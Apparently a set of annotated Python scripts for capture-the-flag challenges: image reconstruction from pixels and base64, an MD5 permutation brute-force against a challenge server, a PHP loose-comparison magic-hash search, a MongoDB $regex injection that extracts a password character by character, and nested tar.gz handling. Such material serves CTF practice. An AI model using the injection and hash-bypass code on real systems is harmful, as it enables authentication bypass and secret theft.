1.利用像素点还原图片。
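"""Rebuild an RGB image from a text file holding one "r,g,b" pixel per line.

Fixes over the original listing: the `//` "comments" were floor-division
operators (a SyntaxError in Python), `file_object.next()` is Python 2 only,
and the pixel file was never closed.
"""
import re  # present in the original listing; unused here but kept


def parse_pixel(line):
    """Parse one ``r,g,b`` text line into an ``(r, g, b)`` tuple of ints.

    Only the first three comma-separated fields are used. Raises ValueError if
    fewer than three integers are present or a channel is outside 0..255, so
    a corrupt dump fails loudly instead of producing a garbage image.
    """
    parts = [int(p) for p in line.strip().split(",")[:3]]
    if len(parts) != 3:
        raise ValueError("expected 'r,g,b', got %r" % (line,))
    for value in parts:
        if not 0 <= value <= 255:
            raise ValueError("channel value out of range in %r" % (line,))
    return tuple(parts)


def build_image(width, height, pixel_lines):
    """Return a new RGB PIL image of *width* x *height* filled from *pixel_lines*.

    Lines are consumed column-major (x outer, y inner), exactly the order the
    original script read them, so an existing ce.txt still renders correctly.
    Raises ValueError if the input runs out before width*height pixels.
    """
    # Third-party import kept local so parse_pixel stays usable without Pillow.
    from PIL import Image

    img = Image.new("RGB", (width, height))
    lines = iter(pixel_lines)
    for x in range(width):
        for y in range(height):
            try:
                line = next(lines)
            except StopIteration:
                raise ValueError("pixel file ended early at (%d, %d)" % (x, y)) from None
            img.putpixel((x, y), parse_pixel(line))
    return img


if __name__ == "__main__":
    # 887 * 111 = 98457: factor the line count of ce.txt to recover the size.
    WIDTH, HEIGHT = 887, 111
    with open("ce.txt") as pixel_file:  # ce.txt holds one "r,g,b" pixel per line
        image = build_image(WIDTH, HEIGHT, pixel_file)
    image.show()
    image.save("c.png")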
2.py requests方法的利用以及利用正则匹配查找文本暴力破解md5值。
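# coding: utf-8
"""Fetch a target MD5 and a character set from the challenge page, brute-force
the permutation whose MD5 matches, and submit it.

Fixes over the original listing: `//` comments were floor-division operators
(SyntaxError); the PHPSESSID was sent as a GET *body* (`data=`) instead of a
Cookie, so the server never saw it; all 9! candidates were materialised in a
list and the search did not stop at the first hit; md5() needs bytes on Python 3.
"""
import hashlib
import itertools
import re

BASE_URL = "http://106.75.67.214:2050/"
ENTRY_URL = BASE_URL + "?pass=bee7a613a8fa4f2f"
# The challenge hands out one PHPSESSID; it must travel in the Cookie header.
SESSION_COOKIES = {"PHPSESSID": "6h7b4caq8bo41i3m5fg2983cq5"}

# Same patterns as the original ("sh\">(.*)\<" / "code\">(.*)\<"), as raw strings.
TARGET_RE = re.compile(r'sh">(.*)<')
CODE_RE = re.compile(r'code">(.*)<')


def first_match(pattern, text, what):
    """Return the first capture of compiled *pattern* in *text*.

    Raises ValueError naming *what* when nothing matches, instead of the bare
    IndexError the original produced on an unexpected page.
    """
    found = pattern.findall(text)
    if not found:
        raise ValueError("could not locate %s in response" % what)
    return found[0]


def find_preimage(target_hex, alphabet, length=9):
    """Return the permutation of *alphabet* (size *length*) whose MD5 is *target_hex*.

    Candidates are generated lazily and the search stops at the first hit.
    *target_hex* is normalised (strip + lower) because hexdigest() is lowercase.
    Returns None when no permutation matches.
    """
    target_hex = target_hex.strip().lower()
    for combo in itertools.permutations(alphabet, length):
        candidate = "".join(combo)
        if hashlib.md5(candidate.encode()).hexdigest() == target_hex:
            return candidate
    return None


def main():
    """Drive the challenge end to end; prints the final response body and headers."""
    import requests  # third-party; local import keeps the pure helpers importable without it

    session = requests.session()
    session.cookies.update(SESSION_COOKIES)
    page = session.get(ENTRY_URL)
    target = first_match(TARGET_RE, page.text, "target hash")
    code_chars = first_match(CODE_RE, page.text, "code characters")

    answer = find_preimage(target, code_chars)
    if answer is None:
        raise SystemExit("no permutation of %r hashes to %s" % (code_chars, target))
    flag = session.get(BASE_URL, params={"code": answer})
    print(flag.content)
    print(flag.headers)


if __name__ == "__main__":
    main()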
3.利用py将base64编码的字符串还原成图片
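"""Write a base64-encoded image back to disk.

Fixes over the original listing: the literal ``'''''sdasdas=='''`` actually
contained two stray quote characters, the output file was never closed, and
invalid characters in the payload were silently discarded (default
b64decode behaviour), which yields a corrupt image with no error.
"""
import base64
import os  # present in the original listing; unused here but kept

# Paste the base64 payload here (placeholder). Newlines/whitespace are tolerated.
strs = """sdasdas=="""
OUTPUT_PATH = "1.jpg"


def decode_image(encoded):
    """Decode base64 *encoded* text to bytes.

    Whitespace is removed first; any remaining character outside the base64
    alphabet (or bad padding) raises binascii.Error because validate=True.
    """
    cleaned = "".join(encoded.split())
    return base64.b64decode(cleaned, validate=True)


def write_image(encoded, path=OUTPUT_PATH):
    """Decode *encoded* and write it to *path* in binary mode; returns *path*."""
    data = decode_image(encoded)
    with open(path, "wb") as out:
        out.write(data)
    return path


if __name__ == "__main__":
    write_image(strs)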
4.生成0e哈希值（用于绕过 PHP 的松散比较 `==`：形如 `0e` 后面全是数字的哈希会被当成科学计数法的 0，因此两个这样的哈希互相"相等"）:
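# coding: utf-8
"""Search for "magic hash" payloads that defeat PHP loose comparison (==).

PHP compares two numeric-looking strings numerically, so a hash of the form
"0e" + decimal digits equals "0" and every other such hash. This script
models a server computing md5(md5(p) + SALT) and looks for payloads p whose
result has that shape.

Fixes over the original listing: `.hexdigest` was missing its call
parentheses (TypeError on the concatenation), the outer md5 object was
indexed directly instead of its hexdigest, `&` was used for boolean `and`,
and the search never stopped after a hit.
"""
import hashlib
import itertools

DEFAULT_ALPHABET = "qwertyuioplkjhgfdsazxcvbnm123654789"
DEFAULT_SALT = "SALT"
# The original searched 35**30 candidates, i.e. effectively forever; keep the
# default but let callers shrink it.
DEFAULT_LENGTH = 30


def is_magic_hash(digest):
    """True if *digest* is "0e" followed by one or more ASCII decimal digits."""
    rest = digest[2:]
    return digest[:2] == "0e" and bool(rest) and all(c in "0123456789" for c in rest)


def magic_digest(payload, salt=DEFAULT_SALT):
    """Return md5(md5(payload).hexdigest() + salt).hexdigest() for a str *payload*."""
    inner = hashlib.md5(payload.encode()).hexdigest()
    return hashlib.md5((inner + salt).encode()).hexdigest()


def find_magic_payloads(alphabet=DEFAULT_ALPHABET, length=DEFAULT_LENGTH, salt=DEFAULT_SALT):
    """Yield each payload of *length* chars over *alphabet* whose magic_digest is a magic hash.

    itertools.product is lazy, so memory stays flat although the search space
    is len(alphabet) ** length.
    """
    for chars in itertools.product(alphabet, repeat=length):
        payload = "".join(chars)
        if is_magic_hash(magic_digest(payload, salt)):
            yield payload


def go(alphabet=DEFAULT_ALPHABET, length=DEFAULT_LENGTH, salt=DEFAULT_SALT):
    """Print every magic payload found; with the defaults this never returns."""
    for payload in find_magic_payloads(alphabet, length, salt):
        print(payload)


if __name__ == "__main__":
    go()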
5.mongodb基于正则注入:
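# coding: utf-8
"""Character-by-character extraction through a MongoDB ``$regex`` operator injection.

The login handler is probed with passwd[$regex] = ^<known prefix><candidate>;
an HTTP 302 is treated as "the prefix matches", and the prefix grows one
character per round until the flag's closing brace is recovered.

Fixes over the original listing: `r.status_code == "302"` compared an int to
a string and so could never be true (the loop stopped after one round); the
regex sent was `flag + ".*"` without the candidate character, so every probe
tested the same prefix; '}' was checked for but never part of the alphabet.
"""
import re
import string

URL = "http://xx.x.x.x/index.php?"
# The original seed was "c1ctf{ " with a trailing space, which the regex would
# require literally; that space looks accidental and is dropped here.
FLAG_PREFIX = "c1ctf{"
TERMINATOR = "}"
ALPHABET = string.ascii_letters + string.digits + TERMINATOR
USERNAME = "admin"


def regex_fields(prefix):
    """Return the form fields asserting that *USERNAME*'s password starts with *prefix*.

    re.escape keeps '{', '}', '.' and friends literal inside the server-side
    regex; the leading '^' anchors the match to the start of the password.
    """
    return {"username": USERNAME, "passwd[$regex]": "^" + re.escape(prefix)}


def redirect_oracle(url, prefix, method="GET"):
    """True when the server answers a probe for *prefix* with HTTP 302.

    The original sent the fields as a GET body (`data=`); if the target reads
    $_POST, pass method="POST". Redirects are not followed so the 302 is seen.
    """
    import requests  # third-party; local import keeps the pure helpers importable without it

    response = requests.request(method, url, data=regex_fields(prefix), allow_redirects=False)
    return response.status_code == 302  # int, not the string "302"


def extract_flag(oracle, prefix=FLAG_PREFIX, alphabet=ALPHABET, terminator=TERMINATOR):
    """Grow *prefix* one character at a time using ``oracle(candidate) -> bool``.

    Stops when the recovered text ends with *terminator*, or when no character
    of *alphabet* extends it (the secret then contains a character outside
    *alphabet*). Prints each extension and returns what was recovered.
    """
    known = prefix
    while not known.endswith(terminator):
        for ch in alphabet:
            if oracle(known + ch):
                known += ch
                print(known)
                break
        else:
            return known  # nothing in the alphabet extends the prefix
    return known


def main():
    flag = extract_flag(lambda candidate: redirect_oracle(URL, candidate))
    print("recovered: %s" % flag)


if __name__ == "__main__":
    main()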
6.多次压缩打包
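# coding: utf-8
"""Build a chain of nested tar.gz archives (the "unpack 300 times" CTF setup).

Level 0 holds flag.py; every level i >= 1 holds 1.php plus the level i-1
archive. Fixes over the original listing: archives are closed via ``with``,
the odd single-iteration ``for i in range(1, 2)`` is gone, and the depth,
directory and file names are parameters instead of hard-coded.
"""
import os
import tarfile

INNER_FILE = "flag.py"  # packed at level 0
EXTRA_FILE = "1.php"    # added at every outer level
PREFIX = "shell"
DEPTH = 300             # original built shell0 .. shell299


def _archive_path(directory, prefix, level):
    """Path of the archive for *level*: <directory>/<prefix><level>.tar.gz."""
    return os.path.join(directory, "%s%d.tar.gz" % (prefix, level))


def pack_nested(depth=DEPTH, directory=".", prefix=PREFIX,
                inner_file=INNER_FILE, extra_file=EXTRA_FILE):
    """Create <prefix>0.tar.gz ... <prefix><depth-1>.tar.gz inside *directory*.

    Members are added with flat arcnames, so the archive layout does not
    depend on *directory*. Returns the path of the outermost archive.
    """
    outer = _archive_path(directory, prefix, 0)
    with tarfile.open(outer, "w:gz") as archive:
        archive.add(os.path.join(directory, inner_file), arcname=inner_file)
    for level in range(1, depth):
        previous = outer
        outer = _archive_path(directory, prefix, level)
        with tarfile.open(outer, "w:gz") as archive:
            archive.add(os.path.join(directory, extra_file), arcname=extra_file)
            archive.add(previous, arcname=os.path.basename(previous))
    return outer


if __name__ == "__main__":
    pack_nested()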
7.多次解压:
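# coding: utf-8
"""Unpack the nested tar.gz chain down to the innermost archive.

Fixes over the original listing: the file name was built as
``"shell" + str(i) + "tar.gz"`` (missing the dot, so nothing could be
opened); the loop stopped at level 1 and never opened shell0.tar.gz, which
is the one holding flag.py; archives were not closed; and ``extractall()``
ran with no member checks, so a crafted archive (``../x``, absolute paths,
symlinks) could write anywhere the process can.
"""
import os
import tarfile

PREFIX = "shell"
DEPTH = 300  # matches the packing script: shell0 .. shell299


def _reject_unsafe_members(archive, dest):
    """Raise ValueError for any member that would escape *dest* or is a link/device."""
    root = os.path.realpath(dest)
    for member in archive.getmembers():
        target = os.path.realpath(os.path.join(root, member.name))
        if os.path.commonpath([root, target]) != root:
            raise ValueError("refusing to extract %r: outside %s" % (member.name, dest))
        if member.issym() or member.islnk() or member.isdev():
            raise ValueError("refusing to extract %r: link/device member" % member.name)


def safe_extract(archive_path, dest="."):
    """Extract the gzip tarball at *archive_path* into *dest* after vetting members.

    On Python 3.12+ the built-in ``filter="data"`` hardening is applied as well.
    """
    with tarfile.open(archive_path, "r:gz") as archive:
        _reject_unsafe_members(archive, dest)
        if hasattr(tarfile, "data_filter"):
            archive.extractall(dest, filter="data")
        else:
            archive.extractall(dest)


def unpack_nested(depth=DEPTH, directory=".", prefix=PREFIX):
    """Extract <prefix><depth-1>.tar.gz down to <prefix>0.tar.gz, in that order.

    Each extraction drops the next archive into *directory*; level 0 yields
    the innermost payload file.
    """
    for level in range(depth - 1, -1, -1):
        archive_path = os.path.join(directory, "%s%d.tar.gz" % (prefix, level))
        safe_extract(archive_path, directory)


if __name__ == "__main__":
    unpack_nested()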